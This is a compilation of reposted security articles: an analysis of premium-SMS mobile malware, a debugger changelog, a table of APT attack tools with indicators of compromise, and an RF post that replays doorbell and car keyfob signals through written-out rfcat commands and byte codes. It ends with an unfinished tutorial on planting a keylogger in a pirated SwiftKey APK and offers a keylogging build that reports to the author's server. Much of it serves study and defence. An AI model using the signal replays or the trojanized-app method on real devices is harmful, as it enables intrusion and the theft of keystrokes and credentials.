[h=2]Mobile Drive-By Malware example[/h]Jan Širmer March 11th, 2013 Several days ago we received a complaint about javascrpt.ru. After a bit of research, we found that it tries to mimic ajax.google.com and jquery, but the code is an obfuscated/packed redirector. After removing two layers of obfuscation, we found a list of conditions checking visitors’ user Agent. From these conditions. we got a clue and focused on mobile devices. It all starts when a user start browsing internet from their mobile devices. They visit a legitimate site that’s been hacked. This site contains a link to the site javascrpt.ru, where visitors’ browser data is sent. If script hosted at javascrpt.ru recognizes the visitor’s user Agent string as one of the list of conditions, the visitor is redirected to the malicious site, usually hosted at legitimate hosting, distributing malicious files for mobile devices. When users reach this site, the drive-by download starts. We found different behaviors for different devices. For non Android mobiles, a file called load.php ( 2DECBD7C9D058A0BFC27AD446F8B474D99977A857B1403294C0D10078C2DB51D ) is downloaded, though in a fact it is a regular Java file. But as you can see our users are well protected: But the question is what is really happening with an unprotected user? After running this file, the user expects a running application that they started, but in this case a list of agreements appears. And the first line is ‘To gain access to content, you must agree to the terms presented below’. And what are those terms? 1. To gain access to the Service wa**y.ru/ content to make payment by sending up to 3 SMS messages 2. For complete information on pricing, it can be found at the web site: www.mo****1.ru/ (This site doesn’t work right now ) Both Android and other devices are sending SMS to the Russian premium numbers NUMBER = “7255?; NUMBER = “7151?; NUMBER = “9151?; NUMBER = “2855?; After sending SMS, just a simple ICQ application is downloaded from same site: *REMOVED*/land_paysites/files/icq.jar To show better what happens when this site is reached from an Android device, you can check the next screenshots. At first, a file called, e.g., browser.apk (94FDC9CFD801E79A45209BFDC30711CB393E39E6BF2DD43CE805318E80123C14) is downloaded to the device — without the person’s knowledge. You can see in the install window that this application wants access to suspicious services that cost you money. Even in application permissions you can find suspicious permissions for your messages and directly call phone numbers that can cost you money, too. But fortunately avast! stops this application before it can cost you a huge amount of money. If a user install this application, its behavior is very similar to non-Android devices. Device sends pay text messages to those numbers and then downloads and installs a basic Dolphin browser from h***t.ru/land_browsers/files/dolphin.apk Users should be really careful if they found in theirs mobile device some unknown application. Fortunately everybody can read where application will get access to but unfortunately a lot of users don’t really pay attention to required permissions and it can cost them a lot of money but using good antivirus can help them to be protected. Sursa: http://blog.avast.com/2013/03/11/mobile-drive-by-malware-example/

[h=1]Nanomite - Graphical Debugger for x64 and x86 on Windows[/h] [h=2]Changelog[/h] [h=3]Version 0.1 beta 7[/h] fixed some small handling bugs fixed a bug in disassembler which did not replace old protection on memory after disassembling fixed a bug which did not show terminated processes in DetailView fixed a bug which did not show terminated threads in DetailView fixed a bug which did not clean up memory on manual debugge stop improved DB handler added resolve of jump conditions to improve StepOver added "Return" and "Backspace" Hotkey to navigate in Disassembler added "Clear Log" context menu in LogBox added "Show Source" context menu in Disassembler added "Goto Function" context menu in Callstack added a crash handler added Source Viewer added memory pool for performance improvment and memory leak reduction added mouse scrolling in disassembler and stack added direkt run of target after using menu to select a file Cod sursa: https://github.com/zer0fl4g/Nanomite

In-Depth Look: APT Attack Tools of the Trade 4:41 pm (UTC-7) | by Kyle Wilhoit (Threat Researcher) Recently, we shed some light on APT attack tools and how to identify them. Part of our daily tasks as threat researchers revolves around investigating APT actors, and the tools that they utilize to help better protect our customers. The purpose of this blog is to further investigate the tools that APT actors typically use and what they do with them. How these tools are used While many would think these tools are used during the initial compromise phase of an attack- that is not the case with this post. I will be focusing on the tools that are used after the initial compromise is attained. The following diagram illustrates where these tools are commonly used in a traditional APT lifecycle. Figure 1. Traditional APT lifecycle Step 1: The attacker sends malware to the victim. This can be done in many ways – an email message with a malicious attachment, a USB flash disk, or a compromised web site are all possibilities. Step 2: The malware is executed on the affected system. This may require manual steps by the victim, or it could be done without any intervention using exploits. Step 3: When the malware is run, it drops a backdoor such as STARSYPOUND or BOUNCER. These first stage tools push a backdoor to the attacker for later access. (These could be considered first stage tools). It allows the attacker to maintain persistence and get access to the system at a later time. Step 4: The attacker then uploads tools to perform data exfiltration, lateral movement, and a litany of other tasks. Tools overview The tools listed below include some of the tools APT actors use on a daily basis. These tools are typically employed once the APT actor gets access to the victim’s machine via one of the first stage tools listed above. Keep in mind however, that these tools are not inclusive of first stage tools such as backdoors, Trojans, and other categorical tools. In addition, this is not a complete listing of tools since that is impossible to create based on the ever-changing threat landscape. Many APT actors use custom coded applications that perform similar functionality, and thus may differ from those listed below. Use this list as a baseline of functionality to help identify similar tools in your environment and to demonstrate known tools that are used in common APT campaigns. Word of caution Identifying these tools does not necessarily imply that you have been compromised or fallen victim to an APT attack. The IOC’s contain both MD5s of the compiled apps/scripts, and/or unique strings within the code prior to being compiled. Minor modifications to these files can change the MD5 hash, so this is a limited method for identification of these applications/scripts. Also note that the phase of usage is generic for when Trend Micro typically sees these tools used. These tools are sometimes used in other stages of APT attacks. Some of them also have valid use cases where there are business needs for using the application. (Some examples include Netbox, dbgview, sdelete, etc.) [TABLE=align: center] [TR] [TD=align: center]Tool Name[/TD] [TD=align: center]Description[/TD] [TD=align: center]Typical Phase of Usage[/TD] [TD=align: center]Indicators of Compromise (IOC)[/TD] [/TR] [TR] [TD=align: center]GETMAIL[/TD] [TD=align: center]Typically used to ascertain mail archives and mail out of those archives.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]Unique String: Lu’s Crazy Profile (democode) Saved File Name: >=3 digit number-attach.doc[/TD] [/TR] [TR] [TD=align: center]Netbox[/TD] [TD=align: center]For hosting tools/drop servers/ C2 servers. Commonly used as infrastructure on the backend to support operational tasks. (Netbox also has valid uses, and is not a direct indicator of compromise)[/TD] [TD=align: center]Attack, Exfiltration, Persistence[/TD] [TD=align: center]N/A[/TD] [/TR] [TR] [TD=align: center]Pwdump[/TD] [TD=align: center]Dumps password hashes from the Windows registry. Typically used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 0xDD2EF0D6487385839BBF7863FE450CC5[/TD] [/TR] [TR] [TD=align: center]Cachedump[/TD] [TD=align: center]A program for extracting cached password hashes from a system’s registry. Typically used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 5065266fbad9362d5a329c5388627ea5[/TD] [/TR] [TR] [TD=align: center]Lslsass[/TD] [TD=align: center]Dumps active login session password hashes from windows processes. It is used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5:ede305561db6f7ca1783e0fc75d0db14[/TD] [/TR] [TR] [TD=align: center]mapiget[/TD] [TD=align: center]This is for collecting emails directly from Outlook, prior to ever getting archived. It is then dumped to text files.[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]Unique String: WNetCancelConnection2W Saved File Name: 5-mail.txt, mail.txt[/TD] [/TR] [TR] [TD=align: center]HTRAN[/TD] [TD=align: center]Connection bouncer, redirects TCP traffic destinted for one host to an alternate host. It is also used to help obfuscate source IP of an attacker. It allows the attacker to bounce through several connections in the victim country, confusing incident responders.[/TD] [TD=align: center]Attack, Exfiltration, Persistence[/TD] [TD=align: center]MD5:e0c14f98c4d4b995f00d49616bf9ba57, 2edfe2b5238c8f49130f2a2f85e33c18, 1725e68e574e4b077f7d16f7fa30d984, 7e3bb01afb4c50da526d142fdf444688, 3548ea689e06a2599bdd1bdb909abb75,[/TD] [/TR] [TR] [TD=align: center]Windows Credential Editor (WCE)[/TD] [TD=align: center]A security tool that allows to list logon sessions and add, change, list and delete associated credentials[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5:bd73c74819d8db09c645c738bbd3f5b9, df840ac27051d26555a109cc47d03fe4[/TD] [/TR] [TR] [TD=align: center]Lz77.exe[/TD] [TD=align: center]It is used as a compression application to help exfiltrate data. This is commonly seen in Winrar, 7zip, and Winzip.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]MD5: 2238453fd8225baff0d52bf64361b4fd[/TD] [/TR] [TR] [TD=align: center]Gsecdump[/TD] [TD=align: center]Grabs SAM file, cached credentials, and LSA secrets. Used for lateral movement in victim environment and pass-the-hash style attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 57F222D8FBE0E290B4BF8EAA994AC641, 875f3fc948c6534804a26176dcfb6af0, 8ee24ad5b849877907304de566fb6dc6[/TD] [/TR] [TR] [TD=align: center]ZXProxy (A.K.A AProxy)[/TD] [TD=align: center]Proxy functionality for traffic redirection. This helps redirect HTTP/HTTPS connections for source obfuscation. We have seen it used in data exfiltration.[/TD] [TD=align: center]Exfiltration, Persistence[/TD] [TD=align: center]MD5: 0xEB36A5EF6A807FB7B2E2912E08B4882D, 0x69F5A988B4F3A3E5D300D489C9707CD6, 286760651edfe6a8b34988004156b894[/TD] [/TR] [TR] [TD=align: center]LSB-Steganography[/TD] [TD=align: center]Uses steganography techniques to embed files into images. This helps with data exfiltration as well as during the initial compromise of a traditional APT attack.[/TD] [TD=align: center]Initial Compromise, Exfiltration[/TD] [TD=align: center]MD5: c188ef350f1ee0e5fa6f6ef2e70231bc[/TD] [/TR] [TR] [TD=align: center]UPX Shell[/TD] [TD=align: center]Used to help pack code for malware used in APT campaigns. This tool helps prevent reverse engineering and code analysis.[/TD] [TD=align: center]Attack, Persistence[/TD] [TD=align: center]MD5: 1281478d409de246777472db99f58751[/TD] [/TR] [TR] [TD=align: center]ZXPortMap[/TD] [TD=align: center]Traffic redirection tool, which helps to obfuscate the source of connections.[/TD] [TD=align: center]Persistence, Exfiltration[/TD] [TD=align: center]MD5: 9a7b9caae7b8b3a2b5d68e6880b6d0a4, 2fdbb3ee0edc5e589ea727bbc2cd6d50[/TD] [/TR] [TR] [TD=align: center]ZXHttpServer[/TD] [TD=align: center]Small HTTP server that is deployable and extremely flexible. We have seen it used when attempting transfer of some files.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]Unique String: ZXHttpServer, ZXHttpServer.exe[/TD] [/TR] [TR] [TD=align: center]Sdelete[/TD] [TD=align: center]Secure deletion tool. Allows for secure deletion to make forensic recovery difficult- therefore complicating incident response procedures.[/TD] [TD=align: center]Persistence, Cover[/TD] [TD=align: center]MD5: e189b5ce11618bb7880e9b09d53a588f[/TD] [/TR] [TR] [TD=align: center]Dbgview[/TD] [TD=align: center]An application that lets you monitor debug output on your local system, or any computer on the network that you can reach via TCP/IP[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5: cea66497fa93db4b0dd33438a2a5d6bd[/TD] [/TR] [/TABLE] Many of these tools are copied to victim machines, and are often never removed by the APT actors for whatever reason. If you happen to see tools that are similar in function to the tools listed above, I think it warrants a closer look at the tools, and how they are being used in your environment. What Can Be Done There are many things that can be done to help prevent the installation of these applications onto your organizational machines such as the following: Utilize application white listing where necessary to prevent these items from being installed/used on your systems. Include SIEM resources in your organizational budget for robust logging. This will help forensically should it be needed. Remove local administrator rights for users. This will help prevent new applications are installed in the traditional fashion. While some of these applications don’t require install to work, not having administrator rights will limit what these applications can do. Many of the tools listed above will be blocked by Trend Micro products, which classify them as malicious. Here are some additional recommendations on what to do when you see these applications being used in malicious means: Look at firewall, system, security, proxy, and other logs that your system is logging to identify usage patterns of the tools. Look for communication on erroneous ports as well as traffic to IP space that is not typical to the user. Utilize IOCs (indicators of compromise) to locate similar filenames or MD5/SHA hashes for applications similar to above. Focus on path of utilization as well as filename oddities. (Such as an app named xzz.exe, which would raise a red flag) Utilize WMIC to create a script that can search throughout your entire organizational Active Directory trees and look for unique identifiers of these tools. Create a list of bad applications unique to your organization. Utilize these lists and native toolsets to each operating system to locate questionable tools. Tools for Windows like PsExec work well for this. On Linux systems, dpkg-query or qpkg work well for this. Sursa: In-Depth Look: APT Tools of the Trade | TrendLabs Security Intelligence Blog

[h=3]You can ring my bell! Adventures in sub-GHz RF land...[/h]Dammit! Now that song is stuck in my head and will be going around and around for the next three days... Thanks, ! (and apologies if it's now stuck in yours too! But she's right: you can ring my bell. And I can ring yours. And hers. What the hell - let's just all ring each-other's bells shall we? And dim your lights. And open your garage door. And let's do it from the comfort and safety of my car, whilst driving around... Speaking of hell, what the hell am I talking about??? A little while ago I got involved in a project that needed some hardware security testing. It was a complex system that used just about every protocol under the sun, including RF. Now RF, like other 'invisible' transport mechanisms, always gets me interested because, in my experience, once data becomes invisible, something magical happens: they forget about security. Nobody can see what's going on, so we don't need to worry about it, right? Wrong. Time and time again I've seen this... MagStripes, InfraRed, RFID, Bluetooth, Magic Moon Beams. You name it, they'll send data over it insecurely. In this case the RF was mostly standard stuff like WiFi and Zigbee, but there was also something going on in the 400MHz band, so how to take a look at what was there? The obvious answer is to use an SDR (Software Defined Radio), and from previous projects I have a USRP which fits the bill. However, as I travel a lot, I prefer something a little more portable, so I'm always on the lookout for smaller alternatives. As it happens, a friend gave me a nice Christmas gift (thanks CJ!) of a FunCube dongle: This very cool device can receive on any frequency from 64MHz to 1.7GHz and fits in my laptop bag so is absolutely ideal. It also presents itself to the PC as a pseudo sound card, so is very easy to interface to. This was a fantastic bonus for me as I'm already comfortable with the idea of converting audio into data and have used the soundcard in my laptop for that purpose on many previous projects (e.g. magstripes). Radio is, almost by definition, very mysterious. You can't see it and you can't hear it, so using a soundcard is actually a very good shortcut to helping understand this completely unknown source of data. It's not intuitively obvious that it should be that way, but the human brain is very good at recognising patterns, and the soundcard not only provides us with auditory data that our ears will immediately be able to latch onto, but also visual data in the form of an editable wave file. The bottom line is that I don't understand how radio works, and I don't particularly want to - all I want is to be able to capture whatever's being sent over it and convert into something I can deal with - i.e. bits and bytes. So how to do that? The first task is to determine exactly what frequency our signal is on. There are several ways of doing this, and the simplest is to make a rough guess and just take a listen. If you're anywhere close you'll hear something when you activate the device, and you can then tune up or down until you've found the centre frequency and you're getting nice crisp clean signals. This is particularly important when trying to convert mysterious airy-fairy analogue signals back into nice reliable 0s and 1s, as any deviation can end up corrupting your data beyond all recognition. Another way is to use a spectrum analyser. This is essentially another type of RF receiver, that listens on a very wide band and shows you any spikes or other discrepancies, one of which will be the signal you're looking for. This can be in the form of software using the FunCube itself, such as HDSDR (Windows) or QUISK (Linux), or a standalone hardware device like the RF Explorer. I actually use both. The RF Explorer to quickly find the signal, and then QUISK or HDSDR to fine tune. So getting back to our examination, I can't talk about the actual device in question, but since I have a wireless doorbell, let's take a look at that instead... Like most such devices, it helpfully tells you what frequency it's using on its R&TTE approval label. In this case, 433.92 MHz. Putting that into HDSDR and hitting the button produces a nice 'hot' line right on the centre (the white and orange blob in the top window), so it looks like we're in the money... We can also hear what is obviously data. OK, so now what? How do we get it from the sound card into nice friendly binary data? Although we've decided against using the USRP, it's companion software, GNU Radio, is the obvious choice. It has a great helper tool called GNU Radio Companion which makes this kind of task an absolute doddle. There is a plugin for the FunCube which is now bundled with the main GNU Radio distribution, so no extra work is required to get it up and running. Firing it up, we can build a simple setup that connects our funcube to our speakers: and again, if we run it, we get some nice 'data' sounding output... So we can hear it, and it sounds like data, but we still can't do anything useful with it. Saving it to a wavefile is just as easy: and now this is where the fun begins. We can edit that file with any audio editor. I used Audacity but pretty much anything will do. We can clearly see our data bursts, and if we zoom in: we can see some proper structure to it. This not only sounds like data but it looks like it too. What we appear to have is long pulses and short pulses, so we can imagine they may represent 0s and 1s just as they are - maybe a short pulse is a 0 and a long a 1... Now I know I said I wasn't interested in understanding radio, but there is one little thing that will help to convert our data from it's current analogue form into proper digital, and that's modulation. There are many modulation schemes out there, but the two you're most likely to encounter at this level are FM (Frequency Modulation) and AM (Amplitude Modulation). FM is normally used for things that need reasonably high fidelity, like speech or music, but AM, although it can also be used for speech and music, is perfectly suited to binary data as all it needs to be is either 'ON' or 'OFF'. This is also known as OOK, or On-Off Keying, and as we can see from our sample, this is clearly what we are dealing with here. We have a flat line when we're 'OFF', which then becomes wavy when we're 'ON'. Now we know we're dealing with AM, we can get GNU Radio to do one more job for us: demodulate the AM signal. And our signal now looks like this: Now, instead of bursts of wavy stuff, it's pretty much a straight line that goes high or low which is very clearly binary data. We have long pulses and short pulses, and the whole sample is simply this short pattern repeating. If we assume the short pulse represents a 0 and the long a 1, this decodes as: 0100000011110 Add some leading zeros to bring it up to a multiple of eight bits and we get 00001000 00011110, which is 08 1E in hex. Of course it may actually be interpreted differently - the 0 and 1 may be the other way around, and the bit order may be reversed, but for our purposes, at this stage, it really doesn't matter as long as it makes some kind of sense. Great, so now what? I know my doorbell push-button is spitting out '081E', so therefore the bell itself must be listening for '081E' and ringing when it hears it. My neighbour's bell-push won't set it off as it's presumably sending out a different number. But how to test this? Ideally, I'd like to transmit my own signal, from something other than the bell-push, and if the bell rings I know I've got it right. Unfortunately, as cool as it is, the Fun Cube is just a receiver, so we need something that can transmit as well... The easy option would be to go back to the USRP, but I've already discounted that as it won't fit in my laptop bag and I'd like to be able to do this on the move... As I mentioned, the original device we were looking at was also using WiFi and Zigbee, so we were using an Ubertooth 2.4GHz dongle to poke around with that. I knew there were chips in the same device range that did sub-GHz frequencies, so I asked Mike Ossman, the Ubertooth's designer, if he knew of any projects utilising these. I was in luck: he did. Not only had he got some research of his own, but he pointed me at RFCat, a new project (at the time) designed to do exactly this kind of thing. Perfect! Not only would I be able to receive the signals from the bell-push, but I should be able to emulate them as well.RFCat is based around a Texas Instruments SoC (System on Chip) called the CC1111. These are really very cool devices, which provide microprocessor and built-in RF transceiver all in one package. This one even has an AES capable crypto co-processor and built-in USB, so it is the ideal platform for this kind of tomfoolery... Development kits in 433, 868 and 915 MHz bands are available off the shelf, and come in two forms: either as a standalone USB dongle (868/915 only): or these nifty wristwatches: RFCat is a replacement firmware package for the USB dongle part of the kit, and allows low level access to the radio functions via a simple USB command interface. Oh, and it's in python. Joy! So one impatient wait for an overnight delivery later I'm in business and I've got my RFCat dongle up and running. It has a nice object oriented interface, so all you need to do is create an instance and start doing stuff with it (my commands are in bold)... $ rfcat -r 'RfCat, the greatest thing since Frequency Hopping!' Research Mode: enjoy the raw power of rflib currently your environment has an object called "d" for dongle. this is how you interact with the rfcat dongle: >>> d.ping() >>> d.setFreq(433000000) >>> d.setMdmModulation(MOD_ASK_OOK) >>> d.makePktFLEN(250) >>> d.RFxmit("HALLO") >>> d.RFrecv() >>> print d.reprRadioConfig() Python 2.7.2+ (default, Jul 20 2012, 22:15:08) Type "copyright", "credits" or "license" for more information. IPython 0.10.2 -- An enhanced Interactive Python. ? -> Introduction and overview of IPython's features. %quickref -> Quick reference. help -> Python's own help system. object? -> Details about 'object'. ?object also works, ?? prints more. In [1]: d.ping() PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002653 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002528 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004721 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004821 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004573 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002605 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002430 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002678 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002519 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002820 seconds) Out[1]: (10, 0, 0.0331571102142334) In [2]: d.setFreq(433920000) In [3]: d.RFxmit('\x08\x1E') In [4]: At this point, not surprisingly, my doorbell didn't ring. This is because our interpretation of the data, giving us HEX 081E, is a little bit simplistic. The RFCat dongle doesn't understand that we want to represent a 0 as a short pulse and a 1 as a long, so we have to do a bit more work to get it into a format that RFCat can deal with... A traditional microprocessor controlled radio circuit would typically have a separate circuit or daughterboard for the radio portion, and the microprocessor would signal the data it wanted to send by toggling a pin HIGH/LOW. The microprocessor would be entirely responsible for making sure that the timing was correct - i.e. that it held the pin HIGH for as long as it wanted the RF to be 'ON', and LOW for the duration of the 'OFF' period. However, in these SoC devices, the radio part is all done for you and you simply need to tell it what modulation scheme you want, speed of transmission etc., feed it some data and it will do the rest. As we already know the modulation scheme (AM/OOK), that bit's easy, so now we just have to think of our original signal in terms of OOK, and what our data would need to look like to produce the same signal. Looking at the original trace, it's pretty 'readable', but If we want to really tidy it up we can turn it into a square wave and this will make visual checking of bit lengths much easier and more accurate. Since a .wav file is just a header with a bunch of values for each sample, it's really easy to manipulate. In this case we want to take any value that is below 0 and set it to absolute minimum, and anything above 0 we set to maximum, which is effectively what the original source was doing before the signal got converted and sent over RF - a 0 was a pin going LOW and a 1 was a pin going HIGH... Accordingly, I wrote a little command line tool for tweaking wav files: [/FONT]$ wav-cli.py /tmp/test1.wav square 0 out /tmp/ts.wav Converting to square wave Writing /tmp/ts.wav [FONT=Arial] and this is the result: Now we can accurately convert the signal into true OOK binary. We take the smallest element as our single binary digit, and then represent the data with a 1 when we want the line to go high, and 0 when we want it to go low, taking into account the size of our pulse compared to the single binary digit. In this case we only have two different size pulses - short and long, so we can represent them with a single or double digit: Again, we need to add some leading or trailing 0s to give ourselves an 8-bit multiple, so the final number we end up with is 00101100 10010010 01001001 01101101 10110010, or 2C 92 49 6D B2 in HEX. Since it's always the same, we don't really need to understand what this message 'means', only to be able to reproduce it. So in theory, if I set up RFCat to work in OOK mode with the correct speed and modulation, I should be able to transmit 2C92496DB2 and my doorbell should ring (the speed I get by measuring a short pulse width in seconds) ... In [1]: d.setFreq(433920000) In [2]: d.setMdmDRate(int(1.0/0.000302)) In [3]: d.setMdmModulation(MOD_ASK_OOK) In [4]: d.RFxmit('\x2C\x92\x49\x6D\xB2') Hmm.... Nothing. However, my bell-push didn't just transmit the message once, it sent it dozens of times, so maybe I need to do the same: In [5]: d.RFxmit('\x2C\x92\x49\x6D\xB2' * 60) Nope, still nothing. Going back to my original trace I could see there was a gap between each data pulse, which we can easily simulate by adding some extra '0' bits, so: In [6]: d.RFxmit('\x2C\x92\x49\x6D\xB2\x00\x00\x00' * 60) Bingo! The doorbell rings and my dogs go crazy telling me there's someone at the door! Nice!!! Well, this is very cool and all, but it's not very, erm... Bond, is it? I mean, Daniel Craig isn't going to get the girl, save the world and keep Dame Judi happy by saying... "Hang on Bad Guys, I've just got to get my laptop out... plug in this USB dongle... nearly got it... just a tick... Ouch, that hurt!" No. Not really. What we need is something much cooler, sexier, and, well.... shiny! Something Gucci that's always right there, ready to go at a moment's notice... . But wait! What's that in the box of bits that came with my dev kit? A wristwatch? With a frikkin' transmitter built into it???? OK.... now that's what I'm talkin' 'bout! Come to Papa... And so, I give you the latest thing from my local toy store... It's called "radio": [h=2]Chronos Integrated Commander[/h] Or ChronIC for short... It's basically a cut-down RFCat-like firmware package that allows you to use the watch to transmit arbitrary signals. You can set it up either from the watch itself, or via the original Chronos dongle with a python helper, and then the up/down buttons on the right of the watch do the transmitting. The python helper looks like this: $ chronic-cli.py Usage: /usr/local/bin/chronic-cli.py <COMMAND> [ARG(s)] ... [<COMMAND> [ARG(s)] ... ] Commands: BAUD <RATE> Set RF modem baudrate BYRON Configure for Byron doorbell emulation DELAY <0-255> Delay in MS between each DATA transmission DOWN <HEX> <HEX> <HEX> Set DATA for DOWN button - 3 * 63 bytes EXIT Force sync mode EXIT on Chronos FREQ <FREQUENCY> Set Frequency (e.g. 433920000) FRIEDLAND Configure for Friedland doorbell emulation MAN <'ON'|'OFF'> Set Manchester Encoding MOD <FSK|GFSK|OOK|MSK> Modulation: FSK - Frequency Shift Keying GFSK - Gaussian Frequency Shift Keying OOK - On-Off Keying (in ASK mode) MSK - Multiple Frequency Shift Keying REPEAT <0-255> Number of times to repeat DATA when button pressed RUKU Configure for Ruku garage door emulation SERIAL <BAUD> Set access point comms baudrate (default 115200) PULSE <WIDTH> Set pulsewidth (baud rate = 1.0/pulsewidth) TIME Synchronise time/date UP <HEX> <HEX> <HEX> Set DATA for UP button - 3 * 63 bytes Commands will be executed sequentially and must be combined as appropriate. It is recommended to finish with an EXIT to help conserve battery. Full instructions are in the README in the github repo, but here is an example of setting it up to ring my doorbell. Put the watch in 'SYNC' mode, and then: $ chronic-cli.py freq 433920000 man off delay 0 repeat 60 pulse 0.000320 up 2C92496DB2000000 '' '' down 2C92496DB2000000 '' '' exit Setting Frequency: 433920000 (OK) Setting Manchester Encoding: OFF (OK) Setting delay: 0 (OK) Setting repeat: 60 (OK) Setting pulsewidth: 0.00032 (3124.237061 Hz) (OK) Setting UP Button: (OK) Setting DOWN Button: (OK) Sending EXIT command Or you can take the shortcut: $ chronic-cli.py byron Setting up for Byron Doorbell Setting Frequency: 433920000 Setting Manchester Encoding: OFF Setting Delay: 0 Setting Repeat: 60 Setting PulseWidth: 0.000320 (3124.237061 Hz) Setting UP button: 2C92496DB2000000 Setting DOWN button: 2C92496DB2000000 And there are plenty of other targets... Discussions on the gnuradio mailing list back in 2006 show that the obvious one of a car key was being looked at. Matt Ettus says: "After the Wired article today, I've received a couple of email from people who are concerned that the USRP could be used to clone their keyfob transmitters for car alarms and garage doors. I'm not concerned, since there are already many ways to do this (just check the back of pupular science magazine). However, I am curious about it. I know that we can capture and play back any rf signal. The question is whether that replayed signal would result in the door being unlocked. I was under the impression that most of those systems allow an unlock code to only be used once, but does anyone out there know for sure?" Well, here's your answer: Unlocking and re-locking my son's Beemer: And the wife's Disco (note the pause and the second set of 'clunks' - this is because the first command only opens the driver's door, but because we have the option to send multiple sequences we can send another open command which then opens the rest of the doors): Of course, opening car doors is a nice party trick, but because modern vehicles are secured by rolling codes, that's all it is - a party trick. You'll be able to do this once and once only with each 'hacked' sequence... What's of more concern to me are devices like the 'Owl Plug': These handy little devices allow you to control mains voltage appliances via RF. Clearly, this could have serious consequences if care is not taken when switching things on and off. What if it's an electric heater and it got shoved into a corner to vacuum the room? It gets switched back on and bingo, the curtains are on fire! Let's hope they've made the protocol nice and secure then! Oh, dear. No rolling code. Same bit sequence every time: And the only difference between the five buttons on the remote is a few bits. I suspect, therefore, that the only difference between my remote and my neighbour’s will also only be a few bits, so it's probably not much of an exercise to figure out which ones I need to brute force to be able to go around switching things on and off at random (I've ordered another one and will check, so watch this space...). As usual, the code is available on the Aperture Labs tools page, but please bear in mind that while playing with your own RF devices is perfectly OK in any reasonable society, playing with other people's (without their permission) is most definitely not (and probably illegal)! Behave! Posted by Adam "Major Malfunction" Laurie at 03:55 Sursa: Obviously a Major Malfunction...: You can ring my bell! Adventures in sub-GHz RF land...

[h=1]Inserting keylogger code in Android SwiftKey using apktool[/h] Piracy on Android is a very big problem but I wonder do users realise how easy it is to inadvertently download apps with malware. Cracked copies of PC and iPhone apps can have malware as well of course but on both those platforms most software is compiled to machine code. Android apps are coded in Java and compiled to byte code that is run on the Dalvik VM and this byte code is not that hard to edit and insert back into an APK. SwiftKey Keyboard is the top paid app in the Play store at the moment and it’s a great app, best €4 I spent but I knew it’d be heavily pirated at that price. Now your standard malware-ridden Android app or game might have some code that sends you annoying notification ads but anyone who sideloads a dodgy copy of a Android keyboard is taking a serious risk of a keylogger being inserted and people tracking all their passwords, Google searches and Credit Card numbers. In this post, I’ll show you how to do exactly that with apktool and Swiftkey from start to finish, all you need is a basic knowledge of Java and Android. The end result is this Keylogger SwiftKey APK that sends all keylogs to my server. Try it out for yourself, download and install the modified APK, start using it and visit my logger page at www.android-app-development.ie/swiftkey_keylogger/keylogs.php, select your IP and see your keylogs being sent. Scary huh? Goes without saying, be sure to uninstall the app when you see how it works! Continue reading below to see how to do it. [h=2]SwiftKey APK[/h] First you’ve got to understand the Android file format that SwiftKey and all other Android apps are in. The Android package, or APK, is the container for an Android app’s resources and executables. It’s a zipped file that for SwiftKey contains simply: AndroidManifest.xml (serialized, but apktool decodes to source) classes.dex lib/ assets/ res/ META-INF/ The actual bytecode of the application is the classes.dex file, or the Dalvik executable that runs on the device. The application’s resources (i.e. images, sound files) reside in the res directory, and the AndroidManifest.xml is more or less the link between the two, providing some additional information about the application to the OS. The lib directory contains native libraries that Swiftkey uses via NDK, and the META-INF directory contains information regarding the application’s signature. [h=2]The Tools[/h] There’s a few different tools out there to decompile, compile and resign APKs. All the decompilers are based on or use smali to decompile/compile the classes.dex file. apktool wraps up a few of these tools in one but you still have to re-sign and then install on a device. So then there’s APK multitool which wraps apktool, keytool and other things to let you press one button and have your edited code compiled, zipped, signed and installed to your device via adb all in one go. So download that and set it up but remember it’s just a collection of other tools. [h=2]Disassembling SwiftKey[/h] Once you’ve installed APK multitool, you’d normally place your APK in the ‘place-apk-here-for-modding’ folder, open up Script.bat and enter 9 to decompile source and resources. Unfortunately SwiftKey throws errors when you try and recompile resources as it has capitalised resource filenames and was probably compiled with a modified aapt. We call these magick APKs and apktool can’t recompile edited resources but we can still compile edited smali code, which is all we want to make our keylogger anyway. So enter 27 to change the decompile mode to ‘Source Files only’, then enter 9 to decompile. If nothing goes wrong, there’ll be a folder created inside projects called ‘com.touchtype.swiftkey-1.apk’ containing: AndroidManifest.xml (still serialized, remember we didn’t decompile resources) res/ (same as in APK) smali/ apktool.yml The smali directory is probably the most important of the three, as it contains a set of smali files, or bytecode representation of the application’s dex file. You can think of it as an intermediate file between the .java and the executable. Inside the directory we have ‘com’,'oauth’ and ‘org’. We’re looking for code that we can place our keylogger so we can ignore oauth as that’s obviously a library for oauth access. org contains some Apache Commons library so that can be ignored as well. Inside com, android and google directories are to be ingored as well, it’s the touchtype and touchtype_fluency directories that 